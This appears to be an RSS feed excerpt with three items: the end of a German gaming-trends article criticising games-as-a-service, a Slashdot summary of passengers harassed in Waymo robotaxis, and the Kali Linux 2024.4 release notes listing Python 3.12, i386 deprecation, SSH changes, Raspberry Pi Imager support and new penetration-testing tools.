			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Warum funktioniert <strong>Games as as Service </strong>so oft nicht? <em>Suicide Squad</em> hat vieles, was ein gutes Rocksteady-Game braucht: Eine wunderschöne Open-World, fantastische Cutscenes, coole Charaktere. Aber das Gameplay besteht darin, dass wir permanent Wellen von Gegnern plätten. Oder absurd langsame Fahrzeug-Kolonnen beschützen.</p>



<p>Es ist auf stupiden Level-Grind ausgelegt, bei denen wir die Punkte in ein völlig überladenes Upgrade-Menü investieren. Rocksteady ist eines der besten Studios der Branche – es ist geradezu grotesk, was für ein schlechtes Spiel sie hier abgeliefert haben, nur weil man Skins verkaufen wollte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569928","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull \u0026 Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen.","alt":"Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull \u0026 Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull &amp; Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen." class="wp-image-2569928" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?quality=50&amp;strip=all 1920w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull &amp; Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull &amp; Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen.</p></figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Denn Skins und der Verkauf von Upgrades sind der einzige Grund, warum das Missions-Design so daneben ist – ein Service-Game muss endlos laufen; es kann nicht in einem epischen Story-Finale enden. Im Grunde wollte man hier die Fortnite-Teenies abholen, die sich für Harley Quinn ein sexy Outfit kaufen, und damit das gleiche Level zum hundertsten Mal spielen. </p>



<p>Alle wollen ein <em>Fortnite </em>haben und verstehen nicht, dass <em>Fortnite </em>ein sehr gutes Basisspiel ist, welches Epic Games jede Season mit neuen Mechaniken und Welten erweitert. Rocksteady kann kein <em>Fortnite</em>, Gott sei Dank möchte man sagen, denn so dürfen sie jetzt wieder richtige Batman-Singleplayer-Spiele entwickeln.</p>



<p>Auch Sony lässt seine Studios jetzt wieder daran arbeiten, was diese am besten können. Naughty Dog arbeitet etwa an einem brandneuen Spiel im Sci-Fi-Setting, inklusive Weltraum-Porsche und Adidas-Sneakern.</p>



<p><a href="https://www.pcwelt.de/intergalactic-the-heretic-prophet-preview/" target="_blank" rel="noreferrer noopener">Intergalactic: The Heretic Prophet in der Preview – Kopfgeldjagd im Weltraum-Porsche</a></p>



<p>Man hat wohl eingesehen, dass es nicht sinnvoll wäre, mit Naughty Dog eines seiner besten Studios für ein Multiplayer-Experiment einzusetzen, welches mit hoher Wahrscheinlichkeit ihrem Image schaden und nicht so erfolgreich sein wird wie ein Singleplayer-Blockbuster. </p>



<p>Die haben ja nicht nur Spielegeschichte geschrieben, sondern richtig viel Geld verdient… und darauf sollten sich die Publisher mal zurückbesinnen.</p>



<p><strong>Die Verkaufszahlen der letzten Naughty-Dog-Games:</strong></p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Uncharted 4</td><td>18,6 Millionen verkaufte Spiele</td></tr><tr><td>The Last of Us</td><td>20 Millionen verkaufte Spiele</td></tr><tr><td>The Last of Us Remaster</td><td>18 Millionen verkaufte Spiele</td></tr><tr><td>The Last of Us 2</td><td>10,3 Millionen verkaufte Spiele</td></tr></tbody></table></figure>



<p>Ob diese drei Trends wirklich so eintreten wird, ist momentan noch nicht absehbar. Klar ist nur: Das Spielejahr 2025 wird spannender denn je. Auch dank neuer Konsolen wie der <a href="https://www.pcwelt.de/article/2522347/ps5-pro-praxis-test.html" target="_blank" rel="noreferrer noopener">PS5 Pro</a> oder der bald erscheinenden <a href="https://www.pcwelt.de/article/2579205/nintendo-switch-2-ankuendigung-release-specs-trailer.html" target="_blank" rel="noreferrer noopener">Nintendo Switch 2.</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Some Passengers Riding in Waymo's Driverless Cars Face Uncomfortable Situations]]></title>
<description><![CDATA[Alphabet's Waymo robotaxis are providing "hundreds of thousands of driverless rides each month," reports the Washington Post. But as the robotaxi service expands in San Francisco, Los Angeles, Phoenix and Austin, some passengers "have found that traveling by robotaxi can make riders into sitting ...]]></description>
<link>https://tsecurity.de/de/2512930/it-security-nachrichten/some-passengers-riding-in-waymos-driverless-cars-face-uncomfortable-situations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2512930/it-security-nachrichten/some-passengers-riding-in-waymos-driverless-cars-face-uncomfortable-situations/</guid>
<pubDate>Mon, 23 Dec 2024 09:48:50 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Alphabet's Waymo robotaxis are providing "hundreds of thousands of driverless rides each month," reports the Washington Post. But as the robotaxi service expands in San Francisco, Los Angeles, Phoenix and Austin, some passengers "have found that traveling by robotaxi can make riders into sitting ducks for a new form of public harassment."


The Washington Post spoke with four Waymo passengers, three of them women, who said they experienced harassment or what felt like threats to their safety from people who followed, obstructed or attempted to enter a driverless vehicle they were riding in... 

Elliot, a tech worker in San Francisco, recalled in a phone interview a "scary" situation during a Waymo ride late one night in October. A pedestrian tried to enter the driverless vehicle as it waited at a red light. "Go away," Elliot yelled at the man as he knocked on the window before briefly flashing what looked like a knife, video of the incident viewed by The Post showed... In the moment, Elliot said, he wished someone could have "slammed on the gas and gotten away from this guy," adding that Waymo should change how its vehicles respond in such situations... 

Madelline, a 25-year-old restaurant server in San Francisco, said that during a recent Waymo ride at around 2 a.m., the driverless vehicle had to stop after two drivers ahead began yelling at each other and throwing things out of their cars in what appeared to be a road rage dispute. The two cars blocked an intersection and one person got out of one of the vehicles. "I was definitely panicking a little bit," Madelline said, as her car waited for the road to clear instead of turning off as a human driver might do... She would like to have more control over a robotaxi's route but still prefers Waymo rides to using Uber or Lyft, whose drivers sometimes make her uncomfortable... 

In September, Amina V. was on her way to a hair appointment when a man stepped in front of her robotaxi and the car stalled in the middle of the street. She already had been recording herself in the Waymo, so she turned the camera to capture the man hitting on her while her car stood frozen in San Francisco's Soma neighborhood. 

And one Saturday night at 10:30 p.m., a tech worker named Stephanie took a driverless Waymo robotaxi with her sister, and reports confronting "several young men close to the robotaxi honking and yelling, 'Hey, ladies — you guys are hot.'
If she or another human had been driving, it would have been easy to reroute the car to avoid leading the pursuers to her home. But she was scared and didn't know how to change the robot's path. She called 911, but a dispatcher said they couldn't send a police car to a moving vehicle, Stephanie recalled... [S]he said the other car gave up the chase when the Waymo was a minute from her house. She and her sister arrived home safely, though terrified. Stephanie didn't catch the car's license plate number, which the 911 dispatcher requested after her ride concluded. Waymo vehicles, like other driverless cars in development, use multiple cameras to help make sense of the world around them. But when she later asked the company for the car's video footage, hoping it had captured the license plate, Waymo declined to provide it, she said. 

She would like closer coordination between Waymo and first responders and says she is now unsure about self-driving rides after dark. "I would feel safe taking it during the day," Stephanie said. But "at night, maybe I'm safer having someone else in the car just in case something happens." 

A Waymo spokesperson told the Washington Post that their support agents will stay on the line with riders who call in about incidents like this, also working with law enforcement as appropriate — but the agents can't change the vehicle's specific route. (The Post adds that Waymo passengers "can tell a vehicle to pull over or change its next stop or destination using the Waymo app, or ask a support agent to make similar changes.")<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Some+Passengers+Riding+in+Waymo's+Driverless+Cars+Face+Uncomfortable+Situations%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F24%2F12%2F23%2F0129251%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F24%2F12%2F23%2F0129251%2Fsome-passengers-riding-in-waymos-driverless-cars-face-uncomfortable-situations%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/24/12/23/0129251/some-passengers-riding-in-waymos-driverless-cars-face-uncomfortable-situations?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2024.4 Release (Python 3.12, Goodbye i386, Raspberry Pi Imager & Kali NetHunter)]]></title>
<description><![CDATA[Just before the year starts to wrap up, we are getting the final 2024 release out! This contains a wide range of updates and changes, which are in already in effect, ready for immediate download, or updating.
The summary of the changelog since the 2024.3 release from September is:

Python 3.12 - ...]]></description>
<link>https://tsecurity.de/de/2501630/tools/kali-linux-20244-release-python-312-goodbye-i386-raspberry-pi-imager-kali-nethunter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2501630/tools/kali-linux-20244-release-python-312-goodbye-i386-raspberry-pi-imager-kali-nethunter/</guid>
<pubDate>Mon, 16 Dec 2024 21:22:28 +0100</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Just before the year starts to wrap up, we are getting the final 2024 release out! This contains a wide range of updates and changes, which are in already in effect, ready for immediate <a href="https://www.kali.org/get-kali/">download</a>, or <a href="https://www.kali.org/docs/general-use/updating-kali/">updating</a>.</p>
<p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2024-3-release/">2024.3 release from September</a> is:</p>
<ul>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2024-4-release/#a-new-python-version-312">Python 3.12</a></strong> - New default Python version <em>(Au revoir <code>pip</code>, hello <a href="https://pipx.pypa.io/stable/">pipx</a>)</em></li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2024-4-release/#the-end-of-the-i386-kernel-and-images">The end of the i386 kernel and images</a></strong> - Farewell x86 <em>(images)</em>, but not goodbye <em>(packages)</em></li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2024-4-release/#deprecations-in-the-ssh-client-dsa-keys">Deprecations in the SSH client: DSA keys</a></strong> - Reminder about using <code>ssh1</code> if required</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2024-4-release/#raspberry-pi-imager-customizations-support">Raspberry Pi Imager Customizations Support</a></strong> - Able to alter settings at write time</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2024-4-release/#gnome-47">GNOME 47</a></strong> - Now able to synchronize your favorite colors</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2024-4-release/#kali-forums-refresh">Kali Forums Refresh</a></strong> - New heart of the community home</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2024-4-release/#kali-nethunter-updates">Kali NetHunter</a></strong> - Updates to the app, kernels, installer, store and website !</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2024-4-release/#new-tools-in-kali">New Tools</a></strong> - 14 new shiny toys added <em>(and countless updated!)</em></li>
</ul>
<hr>
<h2>A new Python version: 3.12</h2>
<p><strong>Python 3.12 is now the default Python interpreter</strong>. While it was <a href="https://docs.python.org/3/whatsnew/3.12.html">released upstream</a> a year ago , it took a bit of time to become the <a href="https://tracker.debian.org/news/1542739/python3-defaults-3122-1-migrated-to-testing/">default in Debian</a> , and then even more time to <a href="https://pkg.kali.org/news/601805/python3-defaults-3125-1-imported-into-kali-rolling/">make it to Kali Linux</a> , but finally it’s here. Every new version of Python brings along some deprecations or subtle changes of behavior, which in turn breaks some Python packages, and we have to investigate and fix all the issues reported by our QA system. Hence the delay.</p>
<p>There is a major change with this new Python version: <strong>installing third-party Python packages via <code>pip</code> is now strongly discouraged and disallowed by default</strong> . This change has been coming for a long time, <a href="https://www.kali.org/blog/python-externally-managed/">we wrote about it 18 months ago already</a> , been given little reminders in each release blog post since and we gave another push about it in the <a href="https://www.kali.org/blog/kali-linux-2024-3-release/">2024.3 release blog post</a>. Now it’s finally effective.</p>
<p><code>pip</code> users, fear not! It’s not the end of the world: <strong>there is <a href="https://pipx.pypa.io/">pipx</a> as a replacement</strong>. On the surface, it provides a similar user experience, but under the hood it overcomes the one outstanding issue with pip: the lack of environment isolation.</p>
<p><strong>For more details, please check our dedicated documentation page: <a href="https://www.kali.org/docs/general-use/python3-external-packages/">Installing Python Applications via pipx</a></strong>. If you still have a hard time running a third-party Python application in Kali, please reach out to us via our <a href="https://bugs.kali.org/">bug tracker</a>.</p>
<h2>The end of the i386 kernel and images</h2>
<p><em>…but not packages.</em></p>
<p>History lesson: <code>i386</code> is a 32-bit CPU architecture, maybe more widely known by the name <em>x86</em>. It was the CPU architecture of the first generations of Intel Pentium, AMD K6, and Athlon. In short, it was ubiquitous in personal computers back in the 90s. Starting in 2003, a 64-bit version of the x86 architecture appeared, usually named <em>x86-64</em> (or <code>amd64</code> in Debian-based Linux distributions). It marked the end of the 32-bit x86 CPUs.</p>
<p>Despite being long obsolete, this architecture remained supported in software for years. 2019 was the year when major Linux distributions (<a href="https://fedoraproject.org/wiki/Changes/Stop_Building_i686_Kernels">Fedora 31</a> &amp; <a href="https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes">Ubuntu</a> ) started to drop it. Finally, in <a href="https://lists.debian.org/debian-release/2024/10/msg00064.html">October 2024</a>, Debian stopped building a <code>i386</code> kernel (and OS images, as a consequence). Kali Linux, being based on Debian, <a href="https://www.kali.org/blog/end-of-i386-kernel-and-images/">follow suit</a>: <strong>images and releases will no longer be created for this platform</strong>. </p>
<p>It’s important to note that this is not an instant death for i386 though. This is not how architectures die. The i386 kernel and images are gone, however <em><strong>i386 packages in general are not removed</strong> from the repository</em>. It means that it’s <strong>still possible to run i386 programs on a 64-bit system</strong>. Either directly via the package manager (APT supports installation of i386 packages on a amd64 system), or via <a href="https://hub.docker.com/r/kalilinux/kali-rolling/tags">i386 Docker images</a>.</p>
<p>With time, surely more and more i386 packages will disappear, but nobody really knows in advance which packages and ecosystems will go first, and how long others will remain. In particular, one of the biggest areas that keeps i386 alive is gaming: old games that were compiled for 32-bit x86 are still around, and enjoyed by gamers. As a consequence, there are people out there putting effort into keeping it working, and we can hope that a baseline of i386 packages will remain functional for the time being.</p>
<p>If you are impacted by this change and need more guidance to run your i386 binaries on Kali Linux, please reach out to us via our <a href="https://bugs.kali.org/">bug tracker</a>, we will do our best to help.</p>
<h2>Deprecations in the SSH client: DSA keys</h2>
<p>The latest version of OpenSSH (9.8p1) , available in this release of Kali Linux, deprecates DSA keys for good. <strong>If you need this support to connect to very old SSH servers, you will need to use the command <code>ssh1</code> instead of <code>ssh</code></strong>. Let’s take this chance to review how Kali Linux deals with SSH deprecations, and what it provides to make it easier to use the SSH client for pentesting purpose.</p>
<p>Out of the box, Kali comes with a “standard” SSH client, as provided by Debian. It means that SSH is pre-configured with security in mind: some legacy ciphers and algorithms are disabled by default, to prevent you from using potentially weak encryption without knowing.</p>
<p><strong>For pentesting purposes though, we often need to use all these legacy features</strong>, because we need to know if the server that we target has it enabled. To easily enable all the legacy features at once, we provide the command-line tool <a href="https://www.kali.org/tools/kali-tweaks/">kali-tweaks</a>. This tool is a simple menu that allows you to configure various aspects of Kali. In the <em>Hardening</em> section, you can configure SSH for <em>Wide Compatibility</em> (instead of the default <em>Strong Security</em>), and that’s all you need to do to maximize the capabilities of your SSH client.</p>
<p>With that said, when some legacy features are not even compiled in the SSH client anymore (as is the case with DSA keys), you will need to resort to another SSH client: <code>ssh1</code>. <a href="https://www.kali.org/tools/openssh-ssh1">ssh1</a> comes pre-installed in this new release of Kali Linux. In practicality, <strong><code>ssh1</code> is the SSH client frozen at version 7.5</strong> (released in March 2017). This is the <strong>last release of OpenSSH that supports the SSH v.1 protocol, and of course it also supports DSA keys</strong>. If you target very old SSH servers, you might need to use this client, assuming you are using the SSH client directly from the command-line. However, if you use it <em>indirectly</em> (via some tool that uses SSH), it’s possible that the tool does not know about the ssh1 command, so in practice you will lose support for DSA keys with this new Kali release. If you are in this situation, talk to us (via our <a href="https://discord.kali.org/">our Discord server</a> or our <a href="https://bugs.kali.org/">bug tracker</a>), and we might be able to help.</p>
<p>All of this information (and more) is <a href="https://www.kali.org/docs/general-use/ssh-configuration/">available in our documentation</a>.</p>
<h2>Raspberry Pi Imager Customizations Support</h2>
<p>The moment that Pi users have been waiting for has arrived! We are thrilled to announce that Kali’s <strong>Raspberry Pi images now support applying customizations directly from the <a href="https://www.raspberrypi.com/software/">Raspberry Pi Imager software</a></strong>! This is a huge step forward, and we are so excited to bring this much-requested feature to our users. Whether you are a seasoned pro or just getting started, this update is going to make your Raspberry Pi experience even more seamless.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2024-4-release/images/raspberry-pi-imager-custom-image-1.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2024-4-release/images/raspberry-pi-imager-custom-image-1.png" alt="Raspberry Pi Imager Prompt">
</a>
</p>

<p>For those who might not be familiar with the Raspberry Pi Imager, it was <a href="https://www.raspberrypi.com/news/raspberry-pi-imager-imaging-utility/">first introduced in 2020</a> by the Raspberry Pi Foundation. This incredibly handy tool allows users to easily write Raspberry Pi operating system images onto an SD card or USB drive with just a few clicks. But that’s not all — it also lets you apply essential customizations before you even boot up your Pi! You can pre-configure a range of settings, from setting a custom username and password to choosing a hostname, connecting to a Wi-Fi network, and even adding an SSH key for remote access.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2024-4-release/images/raspberry-pi-imager-custom-image-2.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2024-4-release/images/raspberry-pi-imager-custom-image-2.png" alt="Raspberry Pi Imager General Settings">
</a>
</p>

<p>With this latest release, <strong>you can now apply these customizations to all Raspberry Pi images</strong> — with the exception of the PiTail images, <em>which are highly specialized with their own network and user settings</em>. Unfortunately, due to these customizations, applying them via the Raspberry Pi Imager software is not supported for PiTail images. But for everything else, the sky’s the limit!</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2024-4-release/images/raspberry-pi-imager-custom-image-3.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2024-4-release/images/raspberry-pi-imager-custom-image-3.png" alt="Raspberry Pi Imager Service Settings">
</a>
</p>

<h3>How Does It Work?</h3>
<p>The magic happens when you write a Raspberry Pi image to your SD card or USB drive using the imager software. If you choose to enable customizations, the settings are stored in two key files on the <code>/boot</code> partition of the drive:</p>
<ol>
<li><strong>user-data</strong>: This file contains all your personal settings, including the username and password, any locale or timezone preferences, and even your SSH <strong>public</strong> key (if you have chosen to enable SSH).</li>
<li><strong>network-config</strong>: Here you will find your Wi-Fi network settings, including the pre-computed PSK (Password Security Key) for seamless connectivity.</li>
</ol>
<p>Once the Raspberry Pi boots for the first time, these files will apply the custom settings automatically.</p>
<p><strong>A quick tip</strong>: Do not forget to delete these files after the first boot to keep things secure.</p>
<h3>Default Settings for Non-Customized Images</h3>
<p>For users who do not wish to enable customizations, do not worry! The default settings for Raspberry Pi images will remain the same, with <a href="https://www.kali.org/docs/introduction/default-credentials/">kali/kali for the username and password</a>.</p>
<h2>GNOME 47</h2>
<p>We are excited to announce that the latest update to the GNOME Desktop, <a href="https://release.gnome.org/47/">GNOME 47</a>, is now available! This update brings numerous changes and desktop enhancements, but the most notable feature is the <strong>new support for accent color customization</strong>. You can now choose <strong>your favorite color for window and shell widgets</strong>, giving you more control over your desktop’s look and feel.</p>
<p>From Kali’s side, we have also worked on <strong>synchronizing this new setting with the icon theme and legacy GTK window themes</strong> to ensure a cohesive visual experience. To complement this feature, we have created multiple variants of the icon theme to match each accent color. These themes are also available across other desktop environments, allowing you to personalize your Kali experience.</p>
<video class="video-shortcode" preload="none" autoplay muted loop>
<source src="https://www.kali.org/blog/kali-linux-2024-4-release/videos/gnome-colors.mp4">
Your browser does not support the video tag.
</video>
<p><strong>Other Improvements</strong>:</p>
<ul>
<li>New login theme</li>
</ul>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2024-4-release/images/gnome-login-theme.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2024-4-release/images/gnome-login-theme.png" alt="Kali GNOME 47 Login Them ">
</a>
</p>

<ul>
<li>New system-monitor panel extension</li>
</ul>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2024-4-release/images/gnome-panel-system-monitor.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2024-4-release/images/gnome-panel-system-monitor.png" alt="Kali GNOME panel system monitor">
</a>
</p>

<ul>
<li><strong>Improved color-schemes</strong> for <code>gnome-text-editor</code></li>
</ul>
<h2>Kali Forums Refresh</h2>
<p>A couple of weeks ago we launched the refresh of our <a href="https://forums.kali.org/">Kali Forums</a>. With this refresh we are now running a Discourse-powered forum with a new set of moderators thanks to our community moderators from Discord. We are very happy with the activity we have seen on it so far and <strong>hope to see you there</strong>!</p>
<p>For more information, please check out our <a href="https://www.kali.org/blog/forums-refresh/">blog post about the refresh</a>.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2024-4-release/images/kali-forums.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2024-4-release/images/kali-forums.png" alt="Kali Discourse Forums">
</a>
</p>

<h2>New Tools in Kali</h2>
<p>As always, we have various <strong>new tools</strong> added <em>(to the network repositories)</em> - 14 this time! Summarizing what has been added:</p>
<ul>
<li><a href="https://www.kali.org/tools/bloodyad/">bloodyad</a> - Active Directory privilege escalation framework <em>(Submitted by <a href="https://gitlab.com/Arszilla">@Arszilla</a>)</em></li>
<li><a href="https://www.kali.org/tools/certi/">certi</a> - Ask for certificates to ADCS and discover templates <em>(Submitted by <a href="https://gitlab.com/Arszilla">@Arszilla</a>)</em></li>
<li><a href="https://www.kali.org/tools/chainsaw/">chainsaw</a> - Rapidly search and hunt through Windows forensic artefacts <em>(Submitted by <a href="https://gitlab.com/Arszilla">@Arszilla</a>)</em></li>
<li><a href="https://www.kali.org/tools/findomain/">findomain</a> - Fastest and most complete solution for domain recognition <em>(Submitted by <a href="https://gitlab.com/Arszilla">@Arszilla</a>)</em></li>
<li><a href="https://www.kali.org/tools/hexwalk/">hexwalk</a> - Hex analyzer, editor and viewer</li>
<li><a href="https://www.kali.org/tools/linkedin2username/">linkedin2username</a> - Generate username lists for companies on LinkedIn</li>
<li><a href="https://www.kali.org/tools/mssqlpwner/">mssqlpwner</a> - Interact and pwn MSSQL servers</li>
<li><a href="https://www.kali.org/tools/openssh-ssh1/">openssh-ssh1</a> - Secure SHell (SSH) client for legacy SSH1 protocol</li>
<li><a href="https://www.kali.org/tools/proximoth/">proximoth</a> - Control frame attack vulnerability detection tool <em>(Submitted by <a href="https://gitlab.com/TechnicalUserX">@TechnicalUserX</a>)</em></li>
<li><a href="https://www.kali.org/tools/python-pipx/">python-pipx</a> - Execute binaries from Python packages in isolated environments</li>
<li><a href="https://www.kali.org/tools/sara/">sara</a> - RouterOS Security Inspector (Submitted by <a href="https://gitlab.com/casterbyte">@casterbyte</a>)</li>
<li><a href="https://www.kali.org/tools/web-cache-vulnerability-scanner/">web-cache-vulnerability-scanner</a> - Go-based CLI tool for testing for web cache poisoning <em>(Submitted by <a href="https://gitlab.com/Arszilla">@Arszilla</a>)</em></li>
<li><a href="https://www.kali.org/tools/xsrfprobe/">xsrfprobe</a> - An advanced Cross Site Request Forgery (CSRF/XSRF) audit and exploitation toolkit.</li>
<li><a href="https://www.kali.org/tools/nmap/#zenmap">zenmap</a> - The Network Mapper (nmap) front end (<code>zenmap-kbx</code> is no longer needed!)</li>
</ul>
<p><em>There have also been numerous packages updates and new libraries as well. We also bump the Kali kernel to 6.11!</em></p>
<h2>Kali NetHunter Updates</h2>
<p>…There’s a lot here!</p>
<h3>App</h3>
<p>For the <a href="https://store.nethunter.com/packages/com.offsec.nethunter/">Kali NetHunter app</a>, we are very glad to <strong>introduce the Mana toolkit replacement, Wifipumpkin3</strong>. After years of silence regarding android restrictions, <a href="https://x.com/yesimxev">@yesimxev</a>’s research solved the Android IP rules mystery and he added <a href="https://www.kali.org/tools/wifipumpkin3/">Wifipumpkin3</a>, which allows you to create a fake AP with working internet, even on mobile network!</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2024-4-release/images/wifipumpkin3.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2024-4-release/images/wifipumpkin3.png" alt="wifipumpkin3 tool logo">
</a>
</p>

<p>We have a <a href="https://www.youtube.com/shorts/20Df3fgjs4M">quick demo of Wifipumpkin3</a> in action if you want to see the results.</p>
<hr>
<p>Sticking with the Kali NetHunter app, @yesimxev has added a new tab, kernel, which will allow people to <strong>flash their kernel without using recovery</strong> - direct from the app!</p>
<h3>Store</h3>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2024-4-release/images/nethunter-store.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2024-4-release/images/nethunter-store.png" alt="NetHunter Store">
</a>
</p>

<p>The <strong><a href="https://store.nethunter.com/">Kali NetHunter store</a> has had a <em>(long overdue)</em> update.</strong> This is powered by <a href="https://f-droid.org/">F-Droid</a>, and <a href="https://gitlab.com/kalilinux/nethunter/store/">completely open-source</a>, including the <a href="https://gitlab.com/kalilinux/nethunter/store/nethunter-store-website">website</a>, the <a href="https://gitlab.com/kalilinux/nethunter/store/nethunter-store-data">metadata</a> and the apps (<a href="https://gitlab.com/kalilinux/nethunter/apps/kali-nethunter-store-client">#1</a> &amp; <a href="https://gitlab.com/kalilinux/nethunter/apps/kali-nethunter-store-privileged-extension">#2</a>) that goes with it.</p>
<p><em>We hope to work on the store more over the next few Kali releases.</em></p>
